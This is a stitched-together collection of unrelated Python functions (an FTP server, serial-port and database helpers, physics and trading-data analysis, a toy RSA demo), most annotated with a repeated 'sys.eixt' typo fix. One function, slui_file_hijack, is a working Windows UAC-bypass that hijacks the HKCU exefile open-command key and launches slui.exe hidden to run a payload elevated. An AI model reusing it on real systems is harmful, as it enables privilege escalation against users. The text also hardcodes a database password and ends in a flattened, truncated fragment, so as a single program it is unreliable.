def main():
    """Concurrent FTP server: fork one child per accepted client.

    Binds the listening socket to the module-level ADDR, ignores SIGCHLD so
    finished children are reaped automatically (no zombies), and serves each
    client in a forked child running an FtpServer command loop.
    """
    sockfd = socket()
    sockfd.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
    sockfd.bind(ADDR)
    sockfd.listen(3)
    print("Listen the port 8888...")
    # Reap zombie children automatically.
    signal.signal(signal.SIGCHLD, signal.SIG_IGN)
    while True:
        try:
            connfd, addr = sockfd.accept()
        except KeyboardInterrupt:
            sockfd.close()
            # BUG FIX: was sys.eixt(...)
            sys.exit("服务器退出")
        except Exception as e:
            # BUG FIX: 'e' was never bound (the original used a bare
            # 'except Exception:'), so this print raised NameError.
            print("服务器异常:", e)
            continue
        print("连接客户端:", addr)
        # Fork a child to handle this client.
        pid = os.fork()
        if pid == 0:
            # Child: the listening socket belongs to the parent.
            sockfd.close()
            ftp = FtpServer()
            while True:
                data = connfd.recv(1024).decode()
                if not data:
                    # BUG FIX: without this the child spins forever once the
                    # peer disconnects (recv keeps returning b'').
                    break
                if data == 'list':
                    ftp.do_list()
            os._exit(0)
        else:
            # Parent: the connected socket belongs to the child.
            connfd.close()
def get_uart_name():
    """Interactively pick a serial port and return its device name.

    Clears the terminal, lists the ports reported by comports() (indexed
    from 0), and loops until the user enters a valid numeric index.
    Exits the process when no port is connected or on Ctrl-C/EOF.
    """
    while True:
        # Clear screen and home the cursor (ANSI escape sequences).
        sys.stdout.write("\033[2J")
        sys.stdout.write('\033[0;0H')
        port_list = []
        index = 0
        print('串口序号表')
        print('=================================')
        for n, (port, desc, hwid) in enumerate(sorted(comports()), 1):
            port_list.append(port)
            print('序号:{} 名称{}'.format(index, port))
            index += 1
        print('==================================')
        if len(port_list) == 0:
            print('Please connect uart to computer.')
            sys.exit()
        try:
            id = input('序号:')
            if type(id) == str:
                try:
                    id = int(id)
                except:
                    continue
                # NOTE(review): negative indices pass this check and index
                # from the end of the list -- confirm that is acceptable.
                if id < len(port_list):
                    return port_list[id]
                else:
                    print('2:id < {}'.format(len(port_list)))
            else:
                print('1:id < {}'.format(len(port_list)))
        except KeyboardInterrupt:
            # BUG FIX: was sys.eixt(), which raised AttributeError and
            # masked the intended clean exit on Ctrl-C.
            sys.exit()
        except:
            sys.exit()
def create(what):
    '''Add an entry (a contact or a group) into the library database.

    Prompts the user for each field; entering 'q' at any prompt cancels.
    Exits the process with a status message when done or canceled.
    '''
    path = os.path.abspath(contacts.__file__)
    path = os.path.split(path)[0]
    conn = foo.create_connection(os.path.join(path, 'database/libr.db'))
    if not conn:
        return None
    # BUG FIX: the original compared `what == 'contact'.lower()` -- the
    # .lower() was on the (already lowercase) literal instead of `what`.
    if what.lower() == 'contact':
        l_n = interf.get_any('Enter last name (mendatory): ')
        if l_n == 'q':
            sys.exit('Canceled')
        f_n = str(raw_input('Enter first name : '))
        if f_n == 'q':
            sys.exit('Canceled')
        t_n = interf.get_int('Enter telefon number (mendatory): ')
        if t_n == 'q':
            sys.exit('Canceled')
        e_a = str(raw_input('Enter e-mail adress: '))
        if e_a == 'q':
            # BUG FIX: was sys.eixt('Canceled')
            sys.exit('Canceled')
        query = (l_n, f_n, t_n, e_a)
        i = foo.create_contact(conn, query)
    else:
        g_n = interf.get_any('Enter group name (mendatory): ')
        if g_n == 'q':
            sys.exit('Canceled')
        query = (g_n,)
        i = foo.create_group(conn, query)
    if i:
        sys.exit('Done!')
def write(self, physical_time):
    """Append one $ElementData record per field to the Gmsh output file.

    physical_time -- time stamp written into the record header.
    Exits the process if a field's mesh differs from this writer's mesh.
    """
    with open(self.fpath, 'a') as f:
        for field in self.fields:
            if field.mesh != self.mesh:
                # BUG FIX: was sys.eixt(...); also report the field's name
                # rather than the output path, as the message intends.
                sys.exit('mesh in field "{:s}" not correspond to mesh in Output object'.format(field.name))
            cells = self.mesh.cells
            f.write('$ElementData\n')
            f.write('1\n')
            f.write('"%s"\n' % field.name)
            f.write('1\n')
            f.write('%f\n' % physical_time)
            # Header integers (format-specific); preserved as in the original.
            for i in [3, self.nwrite, 1, len(cells)]:
                f.write('%i\n' % i)
            # Element id and value, one line per cell.
            for i in range(len(cells)):
                f.write('%i %f\n' % (cells[i].elem.i, field.new[i]))
            f.write('$EndElementData\n')
    # END of write of one field
    self.nwrite += 1
def find_interface(rho, sigma, debug=False):
    """Locate the density interface (half-height position) row by row.

    rho   -- 2D density array; it is smoothed with a periodic Gaussian
             filter of width *sigma* first.
    debug -- show intermediate plots / prints.
    Returns (xh, rho_h): per-row interface position and half density.
    Exits the process if no starting row can be found.
    """
    rho_s = gaussian_filter(rho, sigma=sigma, mode="wrap")
    nrows = rho_s.shape[0]
    xh = np.zeros(nrows)
    rho_h = np.zeros(nrows)
    if debug:
        plt.imshow(rho_s.T, origin="lower", interpolation="none")
        plt.show()
        plt.close()
    # Find a starting row: try mode=2 first, then fall back to mode=1.
    start_row = None
    idx_max_pre = np.argmax(np.mean(rho_s, axis=0))
    for row, rhox in enumerate(rho_s):
        idx_max, idx_h = find_idx_max(rhox, idx_max_pre, mode=2)
        if idx_max is not None:
            start_row = row
            idx_max_pre = idx_max
            xh[row], rho_h[row] = find_rho_half(rhox, idx_max, idx_h)
            break
    if idx_max is None:
        for row, rhox in enumerate(rho_s):
            idx_max, idx_h = find_idx_max(rhox, idx_max_pre, mode=1)
            if idx_max is not None:
                start_row = row
                idx_max_pre = idx_max
                xh[row], rho_h[row] = find_rho_half(rhox, idx_max, idx_h)
                break
    if idx_max is None:
        print("Cannot find the starting row.")
        # BUG FIX: was sys.eixt()
        sys.exit()
    # Find xh, rho_h for each remaining row, wrapping around periodically.
    for row in range(start_row + 1, start_row + nrows):
        if row >= nrows:
            row -= nrows
        rhox = rho_s[row]
        idx_max = find_idx_max(rhox, idx_max_pre)
        if debug:
            print("row = ", row)
        if debug and row > 1950:
            is_debug = True
        else:
            is_debug = False
        xh[row], rho_h[row] = find_rho_half(rhox,
                                            idx_max,
                                            xh_pre=xh[row - 1],
                                            rho_h_pre=rho_h[row - 1],
                                            debug=is_debug)
        idx_max_pre = idx_max
    if debug:
        mask = rho_s > 1
        plt.imshow(mask.T, origin="lower", interpolation="none")
        yh = np.linspace(0.5, nrows - 0.5, nrows)
        plt.plot(yh, xh, "k")
        plt.show()
        plt.close()
    return xh, rho_h
def _check_events(self):
    """Dispatch pending pygame events (window quit / keydown / keyup)."""
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            # BUG FIX: was sys.eixt() (AttributeError on window close).
            sys.exit()
        elif event.type == pygame.KEYDOWN:
            self._check_keydown_events(event)
        elif event.type == pygame.KEYUP:
            self._check_keyup_events(event)
def main():
    """Populate test_db.tb2 with randomly generated rows.

    Command line:
        -c / --count N   number of rows to insert (required)
        -p / --print     echo each INSERT statement
    """
    need_print = False
    count = None
    try:
        # BUG FIX: '--count' takes a value, so the long form needs '='.
        opts, args = getopt.getopt(sys.argv[1:], "c:p", ["count=", "print"])
    except getopt.GetoptError:
        # BUG FIX: was sys.eixt(2)
        sys.exit(2)
    for opt, arg in opts:
        if opt in ("-c", "--count"):
            count = arg
        elif opt in ("-p", "--print"):
            need_print = True
    print("count is:", count, ", need_print is:", need_print)
    # open db
    db = MySQLdb.connect(host="localhost", user="******", passwd="wawdsh1!")
    # get cursor
    cursor = db.cursor()
    cursor.execute("use test_db")
    for i in range(int(count)):
        name = generate_randname(10)
        birth = generate_randdate('1980-01-01', '2000-12-31')
        death = generate_randdate(birth, '2030-12-31')
        sex = generate_sex()
        # Values come from our own generators, not user input.
        sql = "insert into tb2 values ('%s','%s','%s','%s')" % (name, sex, birth, death)
        if need_print:
            print(sql)
        cursor.execute(sql)
        time.sleep(0.05)
    # commit, then release cursor and connection
    db.commit()
    cursor.close()
    db.close()
    print("succeed")
def LM(self, commodity='rb', exp_list=None, offset=0, freq='5min', flg='train'):
    """Build word-probability tables from tick-direction sequences.

    For each expiry in *exp_list*, loads day and night tick data, encodes
    price moves as a ternary direction string (2 up / 1 down / 0 flat),
    counts every word of length 1..self._n-1, and returns a DataFrame of
    word probabilities.  *flg* selects the hard-coded train/valid window.
    """
    # Avoid a mutable default argument; behavior is unchanged.
    if exp_list is None:
        exp_list = ['1701']
    # dictionary to save word counts for each commodity
    word_counts_dict = {}
    for l in np.arange(1, self._n):
        word_counts_dict[l] = {self.ternary(k, l): 0 for k in np.arange(self._m ** l)}
    print('=' * 12 + commodity + ' ' + flg + '=' * 12)
    data_path = self._data_root_dir + '/' + commodity
    for exp_date in exp_list:
        print('-' * 10 + 'Running:' + exp_date + '-' * 10)
        instrument = commodity + exp_date
        tick_day = df_reader(instrument + '*', topdir=data_path + '/day', offset=offset,
                             freq=freq, day=True, symbol=commodity).get_tick(raw=False)
        tick_night = df_reader(instrument + '*', topdir=data_path + '/night', offset=offset,
                               freq=freq, day=False, symbol=commodity).get_tick(raw=False)
        tick_all = pd.concat([tick_day, tick_night])
        tick_all.sort_index(inplace=True)
        tick_all.to_csv(self._output + '/' + '_'.join([commodity, exp_date, freq, str(offset)]) + '.csv')
        # select train data: hard coded.
        if flg == 'train':
            tick_all = tick_all[tick_all.index < '2016-7-1 09:00:00.0']
        elif flg == 'valid':
            tick_all = tick_all[
                (tick_all.index >= '2016-7-1 09:00:00.0') & (tick_all.index < '2016-10-1 09:00:00.0')]
        else:
            print('Unknown flg')
            # BUG FIX: was sys.eixt()
            sys.exit()
        # Encode each price move as a direction digit: 2 up, 1 down, 0 flat.
        tick_all['Direction'] = tick_all['LastPrice'].pct_change().apply(
            lambda x: 2 if x > 0 else (1 if x < 0 else 0))
        tick_all_sequence = tick_all['Direction'].astype(str).str.cat()
        # Accumulate counts for every possible word of each length.
        for l in np.arange(1, self._n):
            for k in np.arange(self._m ** l):
                word_counts_dict[l][self.ternary(k, l)] += df_reader.count_word(tick_all_sequence,
                                                                                self.ternary(k, l))
    word_prob_all = pd.DataFrame()
    for l in np.arange(1, self._n):
        tmp = self.word_prob(word_counts_dict[l], l)
        word_prob_all = word_prob_all.append(tmp)
    word_prob_all = word_prob_all[['prior', '0', '1', '2', 'total', 'max', 'max_pct']]
    word_prob_all['offset'] = offset
    # print (word_prob_all)
    return word_prob_all
def list(some_module):
    """Print the available choices for *some_module*.

    NOTE(review): this shadows the builtin `list`; the name is kept for
    interface compatibility with existing callers.
    Exits the process on an unknown module name.
    """
    if some_module == "template":
        for i in template_choices:
            print(i)
    elif some_module == "alloc":
        for i in alloc_choices:
            print(i)
    else:
        print("There is no such option")
        # BUG FIX: was sys.eixt()
        sys.exit()
def __init__(self, date=None):
    """Open (creating if needed) the crash database for *date* (YYYY-MM-DD).

    On first use for a date, creates the crash_info / hash_info /
    update_info tables and registers the new db in all_db_info.db.
    Raises ValueError when no date is given.
    """
    if date is not None:
        self.dbname = "".join([DB_PATH, date, ".db"])
        print(self.dbname)
    else:
        # BUG FIX: `raise (ValueError, "...")` raised a tuple, not the error.
        raise ValueError("date needed!!")
    if not os.path.isfile(self.dbname):
        self.conn = sqlite3.connect(self.dbname, 20)
        self.conn.text_factory = str
        cur = self.conn.cursor()
        cur.execute(
            """ CREATE TABLE crash_info ( id INTEGER PRIMARY KEY AUTOINCREMENT, hash_value TEXT NOT NULL, info TEXT NOT NULL, times INTEGER NOT NULL, status INTEGER, author TEXT ); """
        )
        cur.execute(
            """ CREATE TABLE hash_info ( id INTEGER PRIMARY KEY AUTOINCREMENT, hash_value TEXT NOT NULL, count INTEGER NOT NULL);"""
        )
        cur.execute(
            """ CREATE TABLE update_info ( id INTEGER PRIMARY KEY AUTOINCREMENT, update_time REAL NOT NULL);"""
        )
        self.conn.commit()
        # store the new db info into the all_db_info database
        all_db_name = "".join([DB_PATH, "all_db_info.db"])
        if not os.path.isfile(all_db_name):
            print("Wrong db file: %s" % all_db_name)
            # BUG FIX: was sys.eixt(1)
            sys.exit(1)
        db = sqlite3.connect(all_db_name, 2)
        db.text_factory = str
        cur = db.cursor()
        cur.execute(
            "insert into all_db_info (dbdate,dbname,create_time) values (?,?,?)",
            (time.mktime(time.strptime(date, "%Y-%m-%d")), self.dbname, date),
        )
        db.commit()
        db.close()
    else:
        self.conn = sqlite3.connect(self.dbname)
        self.conn.text_factory = str
def __init__(self, mesh, fpath, *fields):
    """Create a Gmsh output file at *fpath*, seeded with the mesh text.

    mesh   -- mesh object; the contents of its .fpath file are copied
              into the new output file.
    fields -- field objects to be written later by write().
    Exits the process if either file cannot be opened.
    """
    self.mesh = mesh
    self.fpath = fpath
    self.fields = []
    self.nwrite = 0
    try:
        # Context managers guarantee both files are closed even on error
        # (the original leaked `f` if reading the mesh file failed).
        with open(self.fpath, 'w') as f, open(self.mesh.fpath, 'r') as fmesh:
            f.write(fmesh.read())
    except IOError:
        # BUG FIX: was sys.eixt(...)
        sys.exit('Can Not open file:\n{0:s}'.format(self.fpath))
    for phi in fields:
        self.fields.append(phi)
def getMainContent():
    """Extract the original poster's content from ./html/1.shtml.

    Writes the formatted body to ./txt/mainContent.txt.  Exits when the
    content is missing or more than one match is found.
    """
    with open('./html/1.shtml', 'rb') as f:
        html = f.read()
    # NOTE(review): the file is opened in binary but the pattern is a str;
    # under Python 3 re.findall would raise TypeError -- confirm this module
    # targets Python 2, or switch to a bytes pattern.
    res = re.findall(r'<div class="bbs-content clearfix">(.*?)</div>', html, re.S)
    if not len(res):
        sys.exit('楼主主贴没有获取到内容...')
    elif len(res) > 1:
        # BUG FIX: was sys.eixt(...)
        sys.exit('楼主主贴获取的内容超过一个...')
    global _main_body
    with open('./txt/mainContent.txt', 'wb') as f:
        res = formatHtml(res[0])
        f.write(res)
def load_resource_general_doc_based(dataset_dirpath, training_map, args):
    """Load dataset from specified preprocessed json file.

    File path is specified by additional_resource_list.
    RETURN: map training_map {unicode label: list document[list [unicode token]]}
    """
    additional_training_map = {}
    # ------------------------------------------------------------
    if level == 1:
        for alphabet in alphabetTable:
            additional_training_map[alphabet] = []
            additional_training_map[u'NOT_' + alphabet] = []
    elif level == 2:
        # BUG FIX: was sys.eixt(...)
        sys.exit('not implemented yet')
    # ------------------------------------------------------------
    f_list = make_filelist(dataset_dirpath)
    # ------------------------------------------------------------
    for fileindex, filepath in enumerate(f_list):
        with codecs.open(filepath, 'r', 'utf-8') as f:
            file_obj = json.load(f)
        alphabet_label_list = file_obj['labels']
        alphabet_label_list = [label_converter(label) for label in alphabet_label_list]
        print(filepath)
        print(alphabet_label_list)
        doc = file_obj['doc_str']
        if args.ins_range == 'document':
            additional_training_map = generate_document_instances(
                doc, filepath, alphabetTable, alphabet_label_list, additional_training_map, args)
        # elif args.ins_range == 'sentence': per-sentence instance creation
        # (for semi-supervised learning with AROW) -- disabled in the original.
        if args.dev == True and fileindex == dev_limit:
            break
    # ------------------------------------------------------------
    # Merge the freshly loaded instances into the caller's training map.
    for label in additional_training_map:
        if label in training_map:
            training_map[label] += additional_training_map[label]
        else:
            training_map[label] = additional_training_map[label]
    # ------------------------------------------------------------
    return training_map
def collect_db_info(dbname, dbdate):
    """Register an existing per-day database file in all_db_info.db.

    dbname -- path of the per-day database (must exist).
    dbdate -- its date as 'YYYY-MM-DD'.
    Exits with status 1 when either database file is missing.
    """
    if not os.path.isfile(dbname):
        print("Wrong db file: %s" % dbname)
        # BUG FIX: was sys.eixt(1)
        sys.exit(1)
    db = "".join([DB_PATH, "all_db_info.db"])
    if not os.path.isfile(db):
        # BUG FIX: the message reported `dbname`, but the missing file
        # here is the registry db; also was sys.eixt(1).
        print("Wrong db file: %s" % db)
        sys.exit(1)
    db = sqlite3.connect(db, 2)
    db.text_factory = str
    cur = db.cursor()
    cur.execute(
        "insert into all_db_info (dbdate,dbname,create_time) values (?,?,?)",
        (time.mktime(time.strptime(dbdate, "%Y-%m-%d")), dbname, dbdate),
    )
    db.commit()
    db.close()
    print("insert all_db_info (%s)" % dbname)
def load_dfd(training_map, args):
    """Load DFD dataset from preprocessed json file.

    DFD file path is specified by dfd_dir_path.
    RETURN: map training_map {unicode label: list document[list [unicode token]]}
    """
    dfd_training_map = {}
    # ------------------------------------------------------------
    if level == 1:
        # Initialize dfd_training_map with 23 labels
        # alphabetTable=[unichr(i) for i in xrange(65, 91) if chr(i) not in [u'I', u'O', u'Y']]
        for alphabet in alphabetTable:
            dfd_training_map[alphabet] = []
            dfd_training_map[u'NOT_' + alphabet] = []
    elif level == 2:
        # BUG FIX: was sys.eixt(...)
        sys.exit('not implemented yet')
    # ------------------------------------------------------------
    dfd_f_list = make_filelist(dfd_dir_path)
    # ------------------------------------------------------------
    for fileindex, filepath in enumerate(dfd_f_list):
        with codecs.open(filepath, 'r', 'utf-8') as f:
            file_obj = json.load(f)
        alphabet_label_list = file_obj['labels']
        doc = file_obj['doc_str']
        if args.ins_range == 'document':
            dfd_training_map = generate_document_instances(
                doc, filepath, alphabetTable, alphabet_label_list, dfd_training_map, args)
        elif args.ins_range == 'sentence':
            # Per-sentence instance creation for semi-supervised learning with AROW.
            dfd_training_map = generate_sentence_instances(
                doc, filepath, alphabetTable, alphabet_label_list, dfd_training_map, args)
        if args.dev == True and fileindex == dev_limit:
            break
    # ------------------------------------------------------------
    # Merge the DFD instances into the caller's training map.
    for label in dfd_training_map:
        if label in training_map:
            training_map[label] += dfd_training_map[label]
        else:
            training_map[label] = dfd_training_map[label]
    # ------------------------------------------------------------
    return training_map
def ask_what_you_need():
    """Show the S/L/Q menu and dispatch on the user's choice.

    Unrecognized input (including 'q') exits the process.
    """
    print("-" * 20)
    print("""
    S|s to store file in database
    L|l to load file from database
    Q|q to quit
    """)
    print("-" * 20)
    user = input("Enter what you whant :")
    # Dispatch table mapping a lowercase choice to its handler.
    choices = {
        "s": func_to_save_file_in_database,
        "l": func_to_load_file_from_database
    }
    if user.lower() in choices.keys():
        choices[user.lower()]()
    else:
        # BUG FIX: was sys.eixt()
        sys.exit()
def process(conn):
    """Handle one client request on socket *conn*.

    Expects a space-separated three-token message; replies with the result
    of tfunction() (or an error string when it returns -1), then closes
    the connection.  Exits the process on an empty or malformed message.
    """
    # read userInput from client
    userInput = conn.recv(BUFFER_SIZE)
    if not userInput:
        print("Error reading message\n")
        sys.exit(1)
    userInput = userInput.strip()
    mylist = userInput.split(" ")
    if len(mylist) != 3:
        print("Input format incorrect!\n")
        # BUG FIX: was sys.eixt(1)
        sys.exit(1)
    print("Received message: ", userInput)
    # TODO: add convertion function here, reply = func(userInput)
    print(mylist)
    reply = tfunction(mylist)
    print(reply)
    if reply == (-1):
        conn.send("Input format incorrect!\n")
    else:
        conn.send('%s' % reply)
    conn.close()
def main():
    """Convert an encoding field in each input line via the aaXY helpers.

    Reads lines from the files given by --input (or stdin), applies the
    converter selected by --action either to the whole line or to the
    1-based --field of delimiter-split lines, and prints the result.
    Exits on an unknown action code.
    """
    args = parse_args()
    infh = fileinput.input(files=args.input)
    # Dispatch table replacing the duplicated if/elif ladders.
    converters = {
        '01': aa01,
        # NOTE(review): '10' also mapped to aa01 in the original --
        # confirm an aa10 helper was not intended.
        '10': aa01,
        '13': aa13,
        '31': aa31,
        '03': aa03,
        '30': aa30,
    }
    for line in infh:
        line = line.rstrip('\n')
        convert = converters.get(args.action)
        if convert is None:
            # BUG FIX: was sys.eixt(...)
            sys.exit('Error: invalid action.')
        if args.field:
            line_lst = line.split(args.delimiter)
            line_lst[args.field - 1] = convert(line_lst[args.field - 1])
            # BUG FIX: was join([line_lst]) -- joining a list that contains
            # a list raises TypeError; join the token list itself.
            line = args.delimiter.join(line_lst)
        else:
            line = convert(line)
        print(line, file=sys.stdout, flush=True)
    infh.close()
def read_thread_func(queue):
    """Read length-prefixed JSON messages from stdin forever.

    Each message is a 4-byte native int length followed by that many bytes
    of UTF-8 JSON text.  Messages go onto *queue*; with no queue (headless
    mode) a fixed message is sent instead.  Exits cleanly on EOF, pushing
    a None sentinel first.
    """
    message_number = 0
    while True:
        # read the message length (first 4 bytes).
        text_length_bytes = sys.stdin.read(4)
        if len(text_length_bytes) == 0:
            if queue:
                queue.put(None)
            # BUG FIX: was sys.eixt(0)
            sys.exit(0)
        # Unpack message length as 4 byte integer.
        # NOTE(review): under Python 3 sys.stdin.read returns str, but
        # struct.unpack and .decode below expect bytes (sys.stdin.buffer)
        # -- confirm this module targets Python 2.
        text_length = struct.unpack('i', text_length_bytes)[0]
        # Read the text (JSON object) of the message.
        text = sys.stdin.read(text_length).decode('utf-8')
        if queue:
            queue.put(text)
        else:
            # In headless mode just send an message.
            send_message('{msg:WJJDKDKKDKK}')
def slui_file_hijack():
    """UAC-bypass attempt via the slui.exe exefile-handler hijack.

    Points the HKCU exefile open command at our payload, launches slui.exe
    hidden (auto-elevated), waits, then removes the registry key again.
    Returns False on registry errors; exits when slui.exe is absent or
    cannot be started.
    """
    if (os.path.isfile(os.path.join("c:\windows\system32\slui.exe")) == True):
        try:
            key = _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, "Software\Classes\exefile\shell\open\command")
            _winreg.SetValueEx(key, None, 0, _winreg.REG_SZ, cmd_path())
            _winreg.CloseKey(key)
        except Exception as error:
            return False
        try:
            win32api.ShellExecute(0, None, "c:\windows\system32\slui.exe", None, None, win32con.SW_HIDE)
        except Exception as error:
            sys.exit()
        # Give the elevated process time to start before cleaning up.
        time.sleep(5)
        try:
            _winreg.DeleteKey(_winreg.HKEY_CURRENT_USER, "Software\Classes\exefile\shell")
        except Exception as error:
            return False
    else:
        # BUG FIX: was sys.eixt()
        sys.exit()
def main():
    """Toy RSA key-generation demo over two small primes p and q.

    Reads p and q from argv (defaults 101, 163), derives n and phi(n),
    and computes the private exponent d = e^-1 mod phi via extended
    Euclid.  Exits if p * q is too small to encode a byte.
    """
    if len(sys.argv) == 3:
        p = int(sys.argv[1])  # 101
        q = int(sys.argv[2])  # 163
    else:
        p = 101
        q = 163
    print('p: ' + str(p))
    print('q: ' + str(q))
    if p * q < 256:
        # BUG FIX: was sys.eixt(...)
        sys.exit('p * q debe ser mayor que 256')
    e = 65537
    # NOTE(review): the original immediately overwrites e with 257 --
    # the 65537 assignment is dead; preserved for fidelity.
    e = 257
    print('e: ' + str(e))
    # compute n
    n = p * q
    # Compute phi(n)
    phi = (p - 1) * (q - 1)
    # print('phi:' + str(phi))
    # Compute modular inverse of e
    gcd, a, b = egcd(e, phi)
    d = a
    # NOTE(review): d can come back negative from egcd; a canonical private
    # exponent would be d % phi -- behavior preserved as-is.
    if (e * d) % phi != 1:
        print('(e * d) % phi = ' + str((e * d) % phi))
    print('d: ' + str(d))
def LM(self, commodity='rb', exp_list=None, offset=0, freq='5min', flg='train'):
    """Build word-probability tables from tick-direction sequences.

    For each expiry in *exp_list*, loads day and night tick data, selects
    the major-contract window (the month two months before expiry, when
    self._sel_mode == 'MajorContract'), encodes price moves as a ternary
    direction string (2 up / 1 down / 0 flat), counts every word of
    length 1..self._n-1, and returns a DataFrame of word probabilities.
    *flg* selects the hard-coded train/valid time window.
    """
    # Avoid a mutable default argument; behavior is unchanged.
    if exp_list is None:
        exp_list = ['1701']
    # dictionary to save word counts for each commodity
    word_counts_dict = {}
    for l in np.arange(1, self._n):
        word_counts_dict[l] = {
            self.ternary(k, l): 0
            for k in np.arange(self._m**l)
        }
    print('=' * 12 + commodity + ' ' + flg + '=' * 12)
    data_path = self._data_root_dir + '/' + commodity
    tick_maj = pd.DataFrame()
    for exp_date in exp_list:
        tick_tmp = pd.DataFrame()
        print('-' * 10 + 'Running:' + exp_date + '-' * 10)
        instrument = commodity + exp_date
        tick_day = df_reader(instrument + '*', topdir=data_path + '/day', offset=offset,
                             freq=freq, day=True, symbol=commodity).get_tick(raw=False)
        tick_night = df_reader(instrument + '*', topdir=data_path + '/night', offset=offset,
                               freq=freq, day=False, symbol=commodity).get_tick(raw=False)
        tick_all = pd.concat([tick_day, tick_night])
        tick_all.sort_index(inplace=True)
        tick_all.to_csv(self._output + '/' + '_'.join([commodity, exp_date, freq, str(offset)]) + '.csv')
        # The major-contract window is the month two months before expiry.
        year_month = '20' + exp_date
        year_month_int = int(year_month)
        year_int = year_month_int // 100
        month_int = year_month_int % 100
        month_tot = year_int * 12 + month_int
        sel_start = '2016-1-1 09:00:00.0'
        sel_end = '2016-1-1 09:00:00.0'
        if (year_month_int > 201602):
            month_tot = month_tot - 2
            year_int = month_tot // 12
            month_int = month_tot % 12
            if month_int == 0:
                year_int = year_int - 1
                month_int = 12
            _, num_days = calendar.monthrange(year_int, month_int)
            sel_start = str(year_int) + '-' + str(month_int) + '-1 09:00:00.0'
            sel_end = str(year_int) + '-' + str(month_int) + '-' + str(num_days) + ' 23:59:59.0'
        print("select data of " + exp_date + " start from " + sel_start + " to " + sel_end)
        if (self._sel_mode == 'MajorContract'):
            tick_tmp = tick_all[(tick_all.index < sel_end) & (tick_all.index > sel_start)]
        # select train data: hard coded.
        if flg == 'train':
            tick_all = tick_all[(tick_all.index < '2016-7-1 09:00:00.0')]
        elif flg == 'valid':
            tick_all = tick_all[(tick_all.index >= '2016-7-1 09:00:00.0')
                                & (tick_all.index < '2016-10-1 09:00:00.0')]
        else:
            print('Unknown flg')
            # BUG FIX: was sys.eixt()
            sys.exit()
        print('total lines: ' + str(tick_all.shape[0]) + ', with ' + str(tick_tmp.shape[0]) +
              ' lines selected as major contract')
        tick_maj = tick_maj.append(tick_tmp)
        tick_maj.to_csv(self._output + '/' + '_'.join([commodity, freq, exp_date, str(offset)]) + 'part.csv')
        # Encode each price move as a direction digit: 2 up, 1 down, 0 flat.
        tick_all['Direction'] = tick_all['LastPrice'].pct_change().apply(
            lambda x: 2 if x > 0 else (1 if x < 0 else 0))
        tick_all_sequence = tick_all['Direction'].astype(str).str.cat()
        # print(tick_all_sequence)
        # Accumulate counts for every possible word of each length.
        for l in np.arange(1, self._n):
            for k in np.arange(self._m**l):
                word_counts_dict[l][self.ternary(k, l)] += df_reader.count_word(
                    tick_all_sequence, self.ternary(k, l))
    word_prob_all = pd.DataFrame()
    tick_maj.to_csv(self._output + '/' + '_'.join([commodity, freq, str(offset)]) + 'all.csv')
    for l in np.arange(1, self._n):
        tmp = self.word_prob(word_counts_dict[l], l)
        word_prob_all = word_prob_all.append(tmp)
    word_prob_all = word_prob_all[[
        'prior', '0', '1', '2', 'total', 'max', 'max_pct'
    ]]
    word_prob_all['offset'] = offset
    # print (word_prob_all)
    return word_prob_all
def dynamic_schedule_based_ue_model(tn): """ Input TimeExpandedNetwork obj; output the time-dependent equilibrium flow.""" print(' ---------------------------------------------------') print(" Time-dependent model begins ...") # Parameters TEST_QUADRATIC_PROG = int(open_config_file('test_quadratic_programming')) QUADRATIC_PROG_SOLVING_PKG = open_config_file('QUADRATIC_PROG_SOLVING_PKG') INTEGER_PROG = float(open_config_file('INTEGER_PROG')) # Number of stops N = len(tn.stops) # Horizon T = tn.T MAX_NUMBER_OF_ITERATIONS = int( open_config_file('MAX_NUMBER_OF_ITERATIONS_FOR_BILEVEL_MODEL')) CONVERGENCE_CRITERION = float( open_config_file('CONVERGENCE_CRITERION_FOR_BILEVEL_MODEL')) # Number of bus lines. num_routes = len(tn.routes) # The most number of choices user could have at a node, which equals # the number of routes, adding a waiting link. num_choices = num_routes + 1 # Periods of measurements (Unit: min) C = int(open_config_file('MEASUREMENT_PERIOD')) # Times of measurements I = int(T / C) sys.setrecursionlimit(5000000) global m print() print(" Horion (T): " + str(T)) print(" Measurements period C: " + str(C)) print(" Times of measurements I: " + str(I)) print(" Optimization package: " + QUADRATIC_PROG_SOLVING_PKG) # Initialization od_flow = np.zeros((N, N, T)) # Input Data # Count data. entry_count = [] exit_count = [] wifi_count = [] passby_count = [] # Retain only data column. entry_count_file = open_data_file_with_header( 'data/entry_count_by_designated_period.csv') exit_count_file = open_data_file_with_header( 'data/exit_count_by_designated_period.csv') wifi_count_file = open_data_file_with_header( 'data/wifi_count_by_designated_period.csv') # Data formats: # (col) 1 2 3 # measurement_seq_number, stop_id, count # Retain only count data. entry_count = [float(item[2]) for item in entry_count_file] exit_count = [float(item[2]) for item in exit_count_file] wifi_count = [float(item[2]) for item in wifi_count_file] # Convert wifi count to stop count. 
# i) First, import ratio file. wifi_sample_ratio = open_data_file_with_header( 'data/wifi_sample_ratio.csv') # Table header: # 0 # sample_ratio wifi_sample_ratio = [float(item[0]) for item in wifi_sample_ratio] # ii) Second, transform. passby_count = [] for k_meas in range(I): for i_stop in range(N): # Note: wifi_count is list passby_count.append(wifi_count[k_meas * N + i_stop] / wifi_sample_ratio[i_stop]) # Print measurements data. if TEST_QUADRATIC_PROG == 1: print() print(' Measurements data:') print(' entry_count:') print(entry_count) print(' exit_count:') print(exit_count) print(' wifi_count:') print(wifi_count) print(' wifi_sample_ratio:') print(wifi_sample_ratio) print(' passby_count:') print(passby_count) # End of test print. # Prepare coefficients for solve quadratic programming # Non-integer prog if QUADRATIC_PROG_SOLVING_PKG == "cvxopt": # Coefficients: Q,p,A,b,G,h # Q & p Q = np.zeros((N * N * T + 3 * N * T, N * N * T + 3 * N * T)) p = np.zeros((N * N * T + 3 * N * T, 1)) # period k_meas for k_meas in range(I): # stop n for i_stop in range(N): for t1 in range(C * k_meas, C * (k_meas + 1)): for t2 in range(C * k_meas, C * (k_meas + 1)): Q[N * N * T + N * t1 + i_stop, N * N * T + N * t2 + i_stop] = 2 Q[N * N * T + N * T + N * t1 + i_stop, N * N * T + N * T + N * t2 + i_stop] = 2 Q[N * N * T + 2 * N * T + N * t1 + i_stop, N * N * T + 2 * N * T + N * t2 + i_stop] = 2 # p p[N * N * T + N * t1 + i_stop, 0] = (-2) * entry_count[N * k_meas + i_stop] p[N * N * T + N * T + N * t1 + i_stop, 0] = (-2) * exit_count[N * k_meas + i_stop] p[N * N * T + 2 * N 